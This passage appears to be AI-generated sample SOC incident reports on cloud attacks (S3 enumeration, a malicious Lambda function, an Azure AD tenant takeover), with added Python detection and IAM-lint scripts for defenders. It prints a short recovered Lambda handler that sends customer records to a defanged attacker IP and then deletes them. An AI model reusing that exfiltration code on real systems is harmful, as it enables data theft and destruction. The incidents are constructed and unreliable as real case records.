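        print(finding)
```

The `office_parent` test is exactly the condition the ASR rule “Block all Office applications from creating child processes” enforces at the endpoint, which is why that rule is the prevention counterpart to this detection.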
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed geolocation discovery |
| 2. Process Investigation | Identify source of commands | CrowdStrike | PowerShell script launched from suspicious macro in document |
| 3. User Interview | Contact alexchen | Teams, Phone | User opened document from email; script ran in background |
| 4. Immediate Action | Terminate PowerShell | CrowdStrike | Process killed |
| 5. Email Investigation | Find source email | Proofpoint, Exchange | Email with macro-enabled document quarantined |
| 6. Account Remediation | Reset alexchen password | Azure AD, AD | Password reset; MFA enforced |
Jira Incident Report
**Ticket:** SOC-2024-215
**Summary:** T1614 – System Location Discovery via Geolocation API
**Status:** RESOLVED
**Resolution:** MALICIOUS – Reconnaissance Detected
**Priority:** P3 – LOW
**Labels:** T1614, location-discovery, reconnaissance, crowdstrike, phishing
**Components:** Endpoint-Security, Threat-Hunting
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “System Location Discovery – Geolocation API Calls”.
Host: DEV-WS-089 (Engineering, user alexchen).
Activity: PowerShell geolocation API calls.
Time: 2024-03-13 10:30 EST.
Technique: MITRE ATT&CK T1614 – System Location Discovery.
2. Technical Analysis:
Attack Chain:
10:00 – User receives phishing email with “Document.docm”
10:05 – User opens document, enables macros
10:06 – Macro runs hidden PowerShell script
10:10 – PowerShell queries geolocation APIs
10:25 – CrowdStrike detects
Geolocation Queries:
ip-api.com: Returns country, city, lat/lon
api.ipify.org: Returns public IP
ipinfo.io: Returns IP and location details
Purpose:
Attacker checking if the system is in a target country (e.g., US)
May adjust behavior based on location (e.g., don’t run if in Russia/China)
User Status:
User unaware; macro executed silently
3. Investigation Findings:
Timeline:
10:00 – Email received
10:05 – Document opened
10:06-10:10 – Script runs
10:25 – Alert
10:27 – SOC investigates
10:28 – PowerShell terminated
Indicators of Compromise (IoCs):
URLs:
– http://ip-api.com/json
– http://api.ipify.org
– http://ipinfo.io/json
File:
– Document.docm (SHA256: a1b2c3d4…)
4. Containment Actions:
Immediate Actions:
Terminated PowerShell.
Quarantined email.
Deleted macro document.
Reset user password.
Host Remediation:
Full scan (clean).
No reimage needed.
User Education:
Counseled on phishing.
5. Root Cause Analysis:
Primary Cause: User opened malicious macro document.
Contributing Factors:
Macros enabled.
No ASR rule blocking Office child processes.
6. Business Impact:
Operational Impact: None.
Data Exposure: None (only location data, already public).
7. Remediation & Prevention:
Completed Actions:
Reconnaissance stopped.
User educated.
Technical Controls Enhanced:
Enabled ASR rule “Block all Office applications from creating child processes”.
Blocked macros in Office files downloaded from the internet (Mark of the Web policy).
8. Conclusion:
An attacker used a macro-enabled document to run PowerShell that queried geolocation APIs to determine the system’s location. CrowdStrike detected the anomalous API calls and enabled termination. The reconnaissance was part of a larger attack chain that was stopped.
Closure Rationale: Reconnaissance detected; process terminated; user educated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-13 11:30 EST
End of Batch 35
Ready for your next batch of prompts whenever you are.
Batch 36: Cloud & Collection Incident Reports
Here are the next 5 detailed SOC incident reports.
176. T1619 – Cloud Storage Object Discovery (AWS GuardDuty Detection)
AWS GuardDuty Alert Details
* **Alert ID:** GUARDDUTY-STORAGE-DISCOVERY-1619-7842
* **Alert Time:** 2024-03-14 09:30:15 EST
* **Severity:** MEDIUM (72/100)
* **Source:** AWS GuardDuty
* **Rule:** “Anomalous S3 Bucket Enumeration”
* **MITRE ATT&CK:** T1619 – Cloud Storage Object Discovery
Alert Details:
Detection: IAM user enumerated multiple S3 buckets and objects
* **AWS Account:** 123456789012 (Production)
* **IAM User:** svc_monitoring (Service Account)
* **Source IP:** 185.143.221[.]89 (Bulgaria)
* **Time:** 09:15-09:30 EST
API Calls (CloudTrail event names; `GetObject` is an S3 data event and is only recorded where data-event logging is enabled for the bucket):

```text
09:15:22 – ListBuckets (list all S3 buckets) – SUCCESS
09:16:45 – ListObjects on bucket: company-data-prod (2,847 objects listed)
09:17:38 – ListObjects on bucket: company-backups-prod (1,234 objects)
09:18:22 – ListObjects on bucket: company-logs-prod (4,567 objects)
09:19:05 – ListObjects on bucket: company-finance-reports (892 objects)
09:19:48 – GetObject on key: finance-reports/Q1_2024.xlsx (12 MB) – DOWNLOADED
09:20:15 – GetObject on key: finance-reports/Q2_2024.xlsx (11 MB) – DOWNLOADED
09:20:55 – GetObject on key: customer-data/export.csv (23 MB) – DOWNLOADED
… (total 12 GetObject calls)
```
Detection Logic:
Service account svc_monitoring normally only lists its own bucket
This activity shows enumeration of multiple buckets not normally accessed
Source IP outside expected region (Bulgaria, not US)
Pattern matches cloud storage discovery and data access
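The baseline comparison above as code, added here as an example and not GuardDuty's detector. It makes one pass over constructed records in the general shape of CloudTrail S3 events (`eventName`, `userIdentity.userName`, `sourceIPAddress`, `requestParameters`, `additionalEventData.bytesTransferredOut`), flags buckets outside the principal's baseline, totals the bytes pulled from them, checks the source IP against the expected CIDR, and emits the least-privilege policy that should replace the over-broad grant. The baseline, the CIDR and the sample records are assumptions; the three named downloads carry the sizes from the alert and nine small log pulls stand in for the remaining GetObject calls.

```python
"""Baseline-deviation check for S3 discovery and download (T1619) over
CloudTrail-shaped records, plus the least-privilege policy that replaces the
over-broad grant. Added example; records, baseline and CIDRs are constructed."""
import ipaddress
import json
from collections import defaultdict

MB = 1024 * 1024

# Assumed baseline: buckets each principal touches normally, and the source
# ranges (VPC CIDR) it is expected to call from.
BASELINE_BUCKETS = {"svc_monitoring": {"company-monitoring-prod"}}
ALLOWED_SOURCES = [ipaddress.ip_network("10.0.0.0/8")]


def _ev(ts, name, user, ip, bucket=None, key=None, out_bytes=0):
    """Build one constructed CloudTrail S3 record."""
    ev = {"eventTime": ts, "eventSource": "s3.amazonaws.com", "eventName": name,
          "userIdentity": {"type": "IAMUser", "userName": user},
          "sourceIPAddress": ip, "requestParameters": {}}
    if bucket:
        ev["requestParameters"]["bucketName"] = bucket
    if key:  # GetObject is a data event; bytesTransferredOut sits in additionalEventData
        ev["requestParameters"]["key"] = key
        ev["additionalEventData"] = {"bytesTransferredOut": out_bytes}
    return ev


def build_sample_trail():
    bad_ip, fin, data = "185.143.221.89", "company-finance-reports", "company-data-prod"
    recs = [_ev("2024-03-14T13:00:00Z", "ListObjects", "svc_monitoring", "10.0.12.5",
                "company-monitoring-prod"),  # normal: own bucket, from the VPC
            _ev("2024-03-14T14:15:22Z", "ListBuckets", "svc_monitoring", bad_ip)]
    for b in (data, "company-backups-prod", "company-logs-prod", fin):
        recs.append(_ev("2024-03-14T14:16:45Z", "ListObjects", "svc_monitoring", bad_ip, b))
    recs += [_ev("2024-03-14T14:19:48Z", "GetObject", "svc_monitoring", bad_ip, fin,
                 "finance-reports/Q1_2024.xlsx", 12 * MB),
             _ev("2024-03-14T14:20:15Z", "GetObject", "svc_monitoring", bad_ip, fin,
                 "finance-reports/Q2_2024.xlsx", 11 * MB),
             _ev("2024-03-14T14:20:55Z", "GetObject", "svc_monitoring", bad_ip, data,
                 "customer-data/export.csv", 23 * MB)]
    for i in range(9):  # the remaining small downloads
        recs.append(_ev("2024-03-14T14:25:00Z", "GetObject", "svc_monitoring", bad_ip,
                        "company-logs-prod", f"logs/app-{i}.log", 4096))
    return json.dumps({"Records": recs})


def source_allowed(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:  # AWS service principals log a hostname here, not an IP
        return True
    return any(addr in net for net in ALLOWED_SOURCES)


def detect_storage_discovery(trail_json, baseline=BASELINE_BUCKETS):
    """Per principal: ListBuckets calls, buckets outside its baseline, objects
    pulled from those buckets with byte totals, and calls from unexpected IPs."""
    per_user = defaultdict(lambda: {"list_buckets": 0, "new_buckets": set(),
                                    "objects": [], "bytes": 0, "bad_ips": set()})
    for r in json.loads(trail_json)["Records"]:
        if r["eventSource"] != "s3.amazonaws.com":
            continue
        user = r["userIdentity"].get("userName", "unknown")
        st, known = per_user[user], baseline.get(user, set())
        bucket = r["requestParameters"].get("bucketName")
        if r["eventName"] == "ListBuckets":
            st["list_buckets"] += 1
        elif bucket and bucket not in known:
            st["new_buckets"].add(bucket)
            if r["eventName"] == "GetObject":
                n = r.get("additionalEventData", {}).get("bytesTransferredOut", 0)
                st["objects"].append((bucket, r["requestParameters"]["key"], n))
                st["bytes"] += n
        if not source_allowed(r["sourceIPAddress"]):
            st["bad_ips"].add(r["sourceIPAddress"])
    return [{"principal": u, "new_buckets": sorted(st["new_buckets"]),
             "objects_downloaded": len(st["objects"]),
             "downloaded_mb": round(st["bytes"] / MB, 2),
             "unexpected_source": sorted(st["bad_ips"]),
             "severity": "high" if st["objects"] else "medium"}
            for u, st in per_user.items() if st["list_buckets"] or st["new_buckets"]]


def least_privilege_policy(user, baseline=BASELINE_BUCKETS, sources=ALLOWED_SOURCES):
    """Scope the principal to its baseline buckets and expected source ranges."""
    arns = []
    for b in sorted(baseline.get(user, ())):
        arns += [f"arn:aws:s3:::{b}", f"arn:aws:s3:::{b}/*"]
    return {"Version": "2012-10-17", "Statement": [{
        "Effect": "Allow", "Action": ["s3:ListBucket", "s3:GetObject"], "Resource": arns,
        "Condition": {"IpAddress": {"aws:SourceIp": [str(n) for n in sources]}}}]}


if __name__ == "__main__":
    for finding in detect_storage_discovery(build_sample_trail()):
        print(finding)
    print(json.dumps(least_privilege_policy("svc_monitoring"), indent=2))
```

Two caveats apply when running this against a real trail: the byte totals are only complete if S3 data-event logging was on for every bucket involved, and the `aws:SourceIp` condition binds the key to the VPC's egress addresses, so a leaked key becomes useless from an attacker's own network without any change to the key itself.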
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify GuardDuty alert | GuardDuty Console, CloudTrail | Confirmed unauthorized S3 enumeration |
| 2. Account Investigation | Check svc_monitoring activity | AWS IAM, CloudTrail | Service account credentials compromised (leaked in GitHub) |
| 3. Immediate Action | Rotate access keys | AWS IAM | svc_monitoring keys rotated |
| 4. Bucket Permissions | Review and restrict bucket policies | S3 Bucket Policies | Removed unnecessary permissions; enforced least privilege |
| 5. Data Access Assessment | Identify downloaded objects | CloudTrail logs | 12 files downloaded (46 MB) – financial and customer data |
| 6. Incident Response | Activate breach response | Legal, Management | Data breach declared |
Jira Incident Report
**Ticket:** SOC-2024-216
**Summary:** T1619 – Cloud Storage Object Discovery & Data Access from Compromised Service Account
**Status:** RESOLVED
**Resolution:** MALICIOUS – Data Access Confirmed
**Priority:** P2 – MEDIUM
**Labels:** T1619, cloud-storage-discovery, s3, guardduty, compromised-credentials
**Components:** Cloud-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: AWS GuardDuty.
Alert: “Anomalous S3 Bucket Enumeration”.
IAM User: svc_monitoring (service account).
Source IP: 185.143.221[.]89 (Bulgaria).
Activity: Listed 5 buckets, downloaded 12 objects (46 MB).
Time: 2024-03-14 09:30 EST.
Technique: MITRE ATT&CK T1619 – Cloud Storage Object Discovery.
2. Technical Analysis:
Attack Chain:
08:30 – svc_monitoring credentials leaked via public GitHub repository
08:45 – Attacker uses credentials to access AWS from Bulgaria
09:15-09:30 – Bucket enumeration and data download
09:30 – GuardDuty detects
Data Accessed:
Q1_2024.xlsx, Q2_2024.xlsx (financial reports)
customer-data/export.csv (customer PII)
backup files, logs, etc. (no sensitive data beyond these)
Total: 12 files, 46 MB
Compromised Credentials:
IAM User: svc_monitoring
Permissions: Read access to multiple S3 buckets (excessive)
Leak Source: Public GitHub (developer committed access key)
Attacker Intent:
Data theft (financial, customer data)
3. Investigation Findings:
Timeline:
08:30 – Credentials compromised
08:45 – Attacker accesses AWS
09:15-09:30 – Data access
09:30 – Alert
09:32 – SOC investigates
09:33 – Keys rotated
09:35 – Access revoked
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
– S3 operations: ListBuckets, ListObjects, GetObject
Credentials:
– svc_monitoring access keys (rotated)
Data:
– 12 files, 46 MB accessed (list attached)
4. Containment Actions:
Immediate Actions:
Rotated svc_monitoring access keys.
Removed excessive S3 permissions (least privilege).
Blocked attacker IP (note: AWS WAF does not sit in front of the S3 or IAM APIs; the effective block for API calls is a Deny with an `aws:SourceIp` condition in the IAM or bucket policy, or an SCP).
Disabled compromised IAM user temporarily.
Data Protection:
Determined scope of accessed data (46 MB).
Notified affected data owners.
Initiated breach response (customer PII exposure).
Cloud Remediation:
Enabled S3 server access logging.
Implemented S3 Block Public Access.
5. Root Cause Analysis:
Primary Cause: Service account credentials leaked in public GitHub repository.
Contributing Factors:
No secret scanning.
Service account had excessive permissions.
No MFA for service accounts.
6. Business Impact:
Operational Impact: None.
Data Exposure: 46 MB of financial and customer data accessed (downloaded).
Regulatory Impact: GDPR/CCPA breach (customer PII).
7. Remediation & Prevention:
Completed Actions:
Keys rotated.
Permissions restricted.
Breach response initiated.
Technical Controls Enhanced:
Implemented secret scanning (GitHub Advanced Security).
Enforced least privilege for service accounts.
Enabled GuardDuty with automated response.
Deployed AWS Config rules for S3 bucket policies.
8. Conclusion:
An attacker obtained compromised service account credentials from a public GitHub repository and used them to enumerate and download 46 MB of sensitive data from S3. GuardDuty detected the anomalous activity, enabling key rotation and breach response.
Closure Rationale: Data accessed; access revoked; breach response initiated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-14 10:30 EST
177. T1648 – Serverless Execution (AWS GuardDuty Detection)
AWS GuardDuty Alert Details
**Alert ID:** GUARDDUTY-SERVERLESS-1648-7842
**Alert Time:** 2024-03-14 14:15:33 EST
**Severity:** HIGH (85/100)
**Source:** AWS GuardDuty + CloudTrail
**Rule:** “Unauthorized Lambda Function Creation and Invocation”
**MITRE ATT&CK:** T1648 – Serverless Execution
Alert Details:
Detection: Unauthorized creation and invocation of AWS Lambda function
**AWS Account:** 123456789012 (Development)
**IAM User:** dev_user (compromised developer account)
**Source IP:** 185.143.221[.]89 (Bulgaria)
**Time:** 14:00-14:15 EST
API Calls (CloudTrail):
```
14:00:15 – iam:CreateRole – created role "lambda-exec-role"
14:01:22 – iam:AttachRolePolicy – attached Lambda execution policy
14:02:45 – lambda:CreateFunction – created function "internal-backup-processor"
14:03:30 – lambda:UpdateFunctionCode – uploaded code (ZIP) from S3 (malicious)
14:04:15 – lambda:CreateEventSourceMapping – mapped to DynamoDB table "customer-data"
14:05:22 – lambda:InvokeFunction – invoked function (test)
14:06:00-14:15:00 – 847 invocations of the function (processing data)
```
Function Code Analysis (from Lambda logs):
Function reads from DynamoDB table “customer-data”
Exfiltrates data to external IP 185.143.221[.]89:443
Deletes records after exfiltration
Detection Logic:
Developer account dev_user does not normally create Lambda functions
Source IP anomalous (Bulgaria)
Function accesses sensitive DynamoDB table
Data exfiltration detected via VPC Flow Logs
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify GuardDuty alert | GuardDuty Console, CloudTrail | Confirmed unauthorized Lambda creation and invocation |
| 2. Function Analysis | Examine Lambda code | AWS Lambda Console | Function exfiltrates DynamoDB data |
| 3. Immediate Action | Delete Lambda function | AWS Lambda | Function deleted |
| 4. Role Cleanup | Delete IAM role and detach policies | AWS IAM | Role “lambda-exec-role” deleted |
| 5. Account Remediation | Disable dev_user account | AWS IAM | Keys rotated; user disabled |
| 6. Data Assessment | Determine exfiltrated data | DynamoDB logs, CloudWatch | 8,000 customer records exfiltrated |
Jira Incident Report
**Ticket:** SOC-2024-217
**Summary:** T1648 – Serverless Execution: Malicious Lambda Exfiltrates Customer Data
**Status:** RESOLVED
**Resolution:** MALICIOUS – Data Breach Confirmed
**Priority:** P1 – CRITICAL
**Labels:** T1648, serverless-execution, lambda, guardduty, data-breach
**Components:** Cloud-Security, Serverless-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: AWS GuardDuty + CloudTrail.
Alert: “Unauthorized Lambda Function Creation and Invocation”.
IAM User: dev_user (compromised developer account).
Function: internal-backup-processor (malicious).
Data: 8,000 customer records exfiltrated.
Time: 2024-03-14 14:15 EST.
Technique: MITRE ATT&CK T1648 – Serverless Execution.
2. Technical Analysis:
Attack Chain:
```
13:30 – dev_user credentials compromised (phishing)
13:45 – Attacker logs into AWS from Bulgaria
14:00-14:05 – Creates IAM role and Lambda function
14:05-14:15 – Invokes function 847 times, exfiltrating data
14:15 – GuardDuty detects
```
Lambda Function Analysis:
Name: internal-backup-processor
Runtime: Python 3.9
Code (as recovered from the function; IP left defanged):
```python
import boto3, requests

def handler(event, context):
    dynamo = boto3.client('dynamodb')
    # Scan the whole table, post each record to the attacker's endpoint, then delete it
    data = dynamo.scan(TableName='customer-data')
    for item in data['Items']:
        requests.post('https://185.143.221[.]89/exfil', json=item)
        dynamo.delete_item(Key=item['id'])
```
Purpose: Exfiltrate and delete customer records
Data Exfiltrated:
8,000 customer records (name, address, email, phone, SSN)
Total size: ~40 MB
Impact:
Customer data stolen
DynamoDB table partially deleted
3. Investigation Findings:
Timeline:
```
13:30 – Account compromised
13:45 – Attacker logs in
14:00-14:15 – Function creation and invocation
14:15 – Alert
14:17 – SOC investigates
14:18 – Function deleted
14:19 – Role deleted
14:20 – Account disabled
```
Indicators of Compromise (IoCs):
AWS:
– Lambda function: internal-backup-processor
– IAM role: lambda-exec-role
– Exfiltration IP: 185.143.221[.]89
Data:
– 8,000 customer records exfiltrated
4. Containment Actions:
Immediate Actions:
Deleted malicious Lambda function.
Deleted IAM role.
Rotated dev_user keys.
Disabled compromised account.
Blocked exfiltration IP.
Data Protection:
Determined scope of data loss (8,000 records).
Notified legal, PR, management.
Began customer notification process.
Restored deleted records from backup (DynamoDB point-in-time recovery).
Cloud Remediation:
Implemented AWS Config rules to monitor Lambda creation.
Enabled VPC Flow Logs for Lambda functions.
Enhanced IAM policies.
5. Root Cause Analysis:
Primary Cause: Developer account compromised.
Contributing Factors:
No MFA on account.
Excessive permissions allowed Lambda creation.
No monitoring for new Lambda functions.
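A check for the "excessive permissions" factor, added here as an example and not taken from the report or from any AWS tool: an action-level lint that answers whether an IAM policy grants the role-creation, PassRole and Lambda calls recorded in the CloudTrail sequence above. The three sample policies are constructed; Resource and Condition elements are ignored on purpose, so the result is a worst-case "could this identity deploy and run a function at all?" rather than a full IAM evaluation.

```python
"""Action-level IAM policy lint: which of the API actions used in this incident's chain
(role creation, PassRole, Lambda create/update/map/invoke) does a policy grant?

Added example, not part of the incident report or of any AWS tooling. Resource and
Condition elements are deliberately ignored (worst-case check). Sample policies are
constructed.
"""
import fnmatch

# The call sequence from the CloudTrail record, used as the lint checklist.
LAMBDA_DEPLOY_ACTIONS = [
    "iam:CreateRole", "iam:AttachRolePolicy", "iam:PassRole",
    "lambda:CreateFunction", "lambda:UpdateFunctionCode",
    "lambda:CreateEventSourceMapping", "lambda:InvokeFunction",
]


def _as_list(value):
    if value is None:
        return []
    return [value] if isinstance(value, (str, dict)) else list(value)


def _matches(pattern, action):
    # IAM action matching is case-insensitive; '*' and '?' are the only wildcards.
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def policy_allows(policy, action):
    """True if `action` is allowed by the policy's Action/NotAction statements.
    An explicit Deny that matches always wins over any Allow."""
    allowed = False
    for stmt in _as_list(policy.get("Statement")):
        if "Action" in stmt:
            hit = any(_matches(p, action) for p in _as_list(stmt["Action"]))
        else:  # NotAction: the statement applies to every action *not* listed
            hit = not any(_matches(p, action) for p in _as_list(stmt.get("NotAction")))
        if not hit:
            continue
        if stmt.get("Effect") == "Deny":
            return False
        allowed = True
    return allowed


def lambda_capabilities(policy):
    """Sorted list of the deploy-chain actions this policy grants."""
    return sorted(a for a in LAMBDA_DEPLOY_ACTIONS if policy_allows(policy, a))


def can_deploy_lambda(policy):
    """CreateFunction plus PassRole is the minimum needed to create a function that runs
    under an execution role; identities holding both should be reviewed."""
    return policy_allows(policy, "lambda:CreateFunction") and policy_allows(policy, "iam:PassRole")


# Constructed: the kind of broad developer policy that let this attack succeed.
EXCESSIVE_DEV_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": ["lambda:*", "iam:*", "dynamodb:*"],
                   "Resource": "*"}],
}

# Constructed: read/invoke only, with PassRole explicitly denied so a future broad
# Allow cannot silently re-open the deploy path.
RESTRICTED_DEV_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["lambda:GetFunction", "lambda:ListFunctions", "lambda:InvokeFunction"],
         "Resource": "arn:aws:lambda:us-east-1:123456789012:function:dev-*"},
        {"Effect": "Deny", "Action": "iam:PassRole", "Resource": "*"},
    ],
}

# Constructed: a NotAction policy that looks restrictive but still grants Lambda creation.
NOTACTION_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "NotAction": ["iam:*", "organizations:*"],
                   "Resource": "*"}],
}

if __name__ == "__main__":
    for name, pol in [("excessive", EXCESSIVE_DEV_POLICY), ("restricted", RESTRICTED_DEV_POLICY),
                      ("notaction", NOTACTION_POLICY)]:
        print(f"{name}: can deploy Lambda = {can_deploy_lambda(pol)}; grants {lambda_capabilities(pol)}")
```

The NotAction sample is the case worth remembering when auditing developer policies: it denies nothing in the `lambda:` namespace, so it grants CreateFunction even though the word never appears in the document. Run a lint like this over every policy attached (directly or via groups) to human users, then confirm the interesting hits with the IAM policy simulator, which does honour Resource and Condition.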
6. Business Impact:
Operational Impact: None.
Data Exposure: 8,000 customer records stolen.
Regulatory Impact: GDPR/CCPA breach.
Reputational Impact: Significant.
7. Remediation & Prevention:
Completed Actions:
Function deleted.
Account secured.
Breach response initiated.
Technical Controls Enhanced:
Enforced MFA for all users.
Implemented least privilege IAM policies.
Enabled GuardDuty with automated response.
Deployed AWS Config rules for Lambda changes.
8. Conclusion:
An attacker compromised a developer account and created a malicious Lambda function that exfiltrated 8,000 customer records from DynamoDB. GuardDuty detected the anomalous activity, enabling deletion of the function. A full data breach response was initiated.
Closure Rationale: Data exfiltrated; function deleted; breach response initiated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-14 15:30 EST
178. T1651 – Cloud Administration Command (Azure AD Detection)
Azure AD Alert Details
**Alert ID:** AAD-CLOUD-ADMIN-1651-7842
**Alert Time:** 2024-03-14 11:30:22 EST
**Severity:** HIGH (88/100)
**Source:** Azure AD Identity Protection + Audit Logs
**Rule:** “Suspicious Cloud Administration Commands from Unusual Location”
**MITRE ATT&CK:** T1651 – Cloud Administration Command
Alert Details:
Detection: Global administrator running high-impact commands from unusual location
**User:** jwilson@company.com (Global Administrator)
**Source IP:** 185.143.221[.]89 (Bulgaria)
**Time:** 11:15-11:30 EST
Azure AD Audit Events:
```
11:15:22 – Add member to group "Global Administrators" (added user attacker@evil.com) – SUCCESS
11:17:45 – Create new conditional access policy "Allow All" (disables MFA) – SUCCESS
11:19:12 – Update domain federation settings (change authentication to attacker-controlled IDP) – SUCCESS
11:21:33 – Add application registration "Internal Tools" with high privileges – SUCCESS
11:23:50 – Grant admin consent to application (allows app to read all mailboxes) – SUCCESS
11:25:15 – Reset password for 5 privileged users (including CEO) – SUCCESS
```
Detection Logic:
jwilson is global admin, but these actions are highly unusual
Source IP Bulgaria (normal location: US)
Commands are high-impact (adding admins, changing federation, resetting passwords)
Pattern matches attacker taking over Azure AD tenant
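The detection logic above, written out as an added example (not part of the report or of Azure AD Identity Protection): each high-impact audit activity is mapped to the takeover stage it serves, and an actor who completes several distinct stages within 15 minutes is reported, with a source country outside the expected set as an aggravating factor. The audit records and the IP-to-country table are constructed; the `activityDisplayName` strings follow Azure AD audit-log naming as I know it and should be checked against your tenant's own logs before use.

```python
"""Correlate high-impact Azure AD admin operations by one actor inside a short window and
score them as a tenant-takeover pattern (several distinct stages, unusual location).

Added example, not part of the incident report or of Azure AD Identity Protection.
Audit records, the IP-to-country table and the stage mapping are constructed; the
activityDisplayName values are assumptions to verify against real tenant logs.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Each high-impact activity is mapped to the takeover stage it serves; several distinct
# stages from one actor in a short window is the signal, not any single operation.
STAGE_BY_ACTIVITY = {
    "Add member to role": "privilege_grant",
    "Add conditional access policy": "mfa_bypass",
    "Update conditional access policy": "mfa_bypass",
    "Set federation settings on domain": "auth_hijack",
    "Add application": "app_backdoor",
    "Consent to application": "app_backdoor",
    "Reset user password": "account_takeover",
}

# Constructed stand-in for a GeoIP lookup.
IP_COUNTRY = {"185.143.221.89": "BG", "203.0.113.10": "US", "198.51.100.7": "US"}


def _audit(t, actor, ip, activity, target):
    """Build one minimal Azure AD directory-audit style record (constructed)."""
    return {"activityDateTime": f"2024-03-14T{t}Z", "activityDisplayName": activity,
            "result": "success",
            "initiatedBy": {"user": {"userPrincipalName": actor, "ipAddress": ip}},
            "targetResources": [{"displayName": target}]}


AUDIT_EVENTS = [
    # Routine admin work from the office range: one stage each, no finding expected.
    _audit("08:00:10", "jwilson@company.com", "203.0.113.10", "Add member to role", "Helpdesk Admins"),
    _audit("09:10:00", "helpdesk@company.com", "198.51.100.7", "Reset user password", "intern01"),
    # The attacker's sequence from the audit log above.
    _audit("11:15:22", "jwilson@company.com", "185.143.221.89", "Add member to role", "Global Administrators"),
    _audit("11:17:45", "jwilson@company.com", "185.143.221.89", "Add conditional access policy", "Allow All"),
    _audit("11:19:12", "jwilson@company.com", "185.143.221.89", "Set federation settings on domain", "company.com"),
    _audit("11:21:33", "jwilson@company.com", "185.143.221.89", "Add application", "Internal Tools"),
    _audit("11:23:50", "jwilson@company.com", "185.143.221.89", "Consent to application", "Internal Tools"),
    _audit("11:25:15", "jwilson@company.com", "185.143.221.89", "Reset user password", "ceo@company.com"),
    _audit("11:25:40", "jwilson@company.com", "185.143.221.89", "Reset user password", "cfo@company.com"),
]


def _ts(e):
    return datetime.strptime(e["activityDateTime"], "%Y-%m-%dT%H:%M:%SZ")


def detect_tenant_takeover(events, allowed_countries, window=timedelta(minutes=15), min_stages=3):
    """One finding per actor whose successful high-impact operations cover at least
    `min_stages` distinct stages within some `window`-long span."""
    by_actor = defaultdict(list)
    for e in events:
        if e.get("result") != "success" or e["activityDisplayName"] not in STAGE_BY_ACTIVITY:
            continue
        by_actor[e["initiatedBy"]["user"]["userPrincipalName"]].append(e)

    findings = []
    for actor, evs in by_actor.items():
        evs.sort(key=_ts)
        for i, start in enumerate(evs):
            span = [e for e in evs[i:] if _ts(e) - _ts(start) <= window]
            stages = {STAGE_BY_ACTIVITY[e["activityDisplayName"]] for e in span}
            if len(stages) < min_stages:
                continue
            ips = {e["initiatedBy"]["user"]["ipAddress"] for e in span}
            countries = {IP_COUNTRY.get(ip, "??") for ip in ips}
            unusual = not countries <= set(allowed_countries)
            findings.append({
                "actor": actor, "stages": sorted(stages), "operations": len(span),
                "first": _ts(span[0]).isoformat(), "last": _ts(span[-1]).isoformat(),
                "source_ips": sorted(ips), "countries": sorted(countries),
                "unusual_location": unusual,
                "severity": "critical" if unusual or len(stages) >= 4 else "high",
                "targets": [t["displayName"] for e in span for t in e["targetResources"]],
            })
            break  # report the earliest qualifying span once per actor
    return findings


if __name__ == "__main__":
    for f in detect_tenant_takeover(AUDIT_EVENTS, allowed_countries={"US"}):
        print(f"[{f['severity']}] {f['actor']} {f['first']}..{f['last']}: "
              f"{len(f['stages'])} stages {f['stages']} from {f['countries']}")
```

The stage mapping is what keeps the rule quiet for legitimate admins: a helpdesk user resetting passwords all day never accumulates a second stage, while a federation change or a new Conditional Access policy is rare enough on its own that many teams also alert on it individually, as the remediation list later in this report does.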
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Azure AD audit logs | Azure AD Portal | Confirmed malicious admin commands |
| 2. User Verification | Contact jwilson | Phone, Teams | jwilson did NOT perform these actions (account compromised) |
| 3. Immediate Action | Disable jwilson account | Azure AD | Account disabled |
| 4. Revert Changes | Reverse all malicious actions | Azure AD PowerShell | Removed attacker from Global Admins, deleted conditional access policy, reverted federation settings, deleted malicious app, reset passwords for affected users |
| 5. Account Remediation | Reset jwilson password | Azure AD | Password reset; MFA enforced |
| 6. Incident Response | Activate emergency response | Management, Legal | Tenant takeover attempt declared |
Jira Incident Report
**Ticket:** SOC-2024-218
**Summary:** T1651 – Cloud Administration Command: Attacker Takes Control of Azure AD Tenant
**Status:** RESOLVED
**Resolution:** MALICIOUS – Changes Reverted, Account Secured
**Priority:** P1 – CRITICAL
**Labels:** T1651, cloud-admin-command, azure-ad, compromised-admin
**Components:** Cloud-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Azure AD Identity Protection + Audit Logs.
Alert: “Suspicious Cloud Administration Commands from Unusual Location”.
User: jwilson@company.com (Global Administrator).
Source IP: 185.143.221[.]89 (Bulgaria).
Actions: Added global admin, changed federation, reset passwords, etc.
Time: 2024-03-14 11:30 EST.
Technique: MITRE ATT&CK T1651 – Cloud Administration Command.
2. Technical Analysis:
Attack Chain:
```
10:30 – jwilson account compromised via phishing
10:45 – Attacker logs into Azure AD portal from Bulgaria
11:00 – Attacker enumerates admin roles
11:15-11:30 – Malicious admin commands
11:30 – Azure AD detects
```
Malicious Actions:
Added attacker as Global Admin: attacker@evil.com (now has full control)
Created Conditional Access policy “Allow All”: disables MFA for all users
Changed federation settings: redirects authentication to attacker-controlled IDP
Added malicious app “Internal Tools”: with permissions to read all mailboxes
Granted admin consent: allows app to access all mailboxes
Reset passwords: for CEO, CFO, CTO, and two IT admins
Attacker Intent:
Full takeover of Azure AD tenant
Access all mailboxes and data
Lock out legitimate admins
Compromised Admin:
jwilson (Global Admin) – no MFA (now enforced)
3. Investigation Findings:
Timeline:
